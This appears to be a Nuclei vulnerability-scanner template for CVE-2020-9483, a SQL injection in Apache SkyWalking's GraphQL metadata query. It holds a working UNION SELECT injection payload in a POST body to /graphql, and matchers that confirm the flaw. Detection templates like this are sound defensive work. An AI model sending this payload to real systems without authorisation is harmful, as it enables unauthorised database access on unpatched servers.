id: CVE-2020-9483 info: name: SkyWalking SQLI author: pikpikcu severity: high description: | When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. remediation: | Apply the latest security patches or updates provided by the SkyWalking project to fix the SQL injection vulnerability. reference: - https://github.com/apache/skywalking/pull/4639 - https://nvd.nist.gov/vuln/detail/CVE-2020-9483 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-9483 cwe-id: CWE-89 epss-score: 0.06298 epss-percentile: 0.92826 cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: skywalking tags: cve,cve2020,sqli,skywalking http: - method: POST path: - "{{BaseURL}}/graphql" body: | {"query":"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\"all_p99\",id:\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \",}, duration: $d){values{value}}}","variables":{"d":{"start":"2021-11-11","end":"2021-11-12","step":"DAY"}}} headers: Content-Type: application/json matchers-condition: and matchers: - type: word part: header words: - "Content-Type: application/json" - type: word part: body words: - "UNION SELECT 1,CONCAT('~','9999999999','~')--" - 'Exception while fetching data' condition: and - type: status status: - 200 # digest: 4a0a00473045022100f020f088e62cdf5dc5dd977f0f2d4f1ed71fc0056c14f9b00553e11989bdb69d0220164defe003c9f96296028dea0e5baa95c685e4c601b79b9fcf602ecac2e472ef:922c64590222798bb761d5b6d8e72950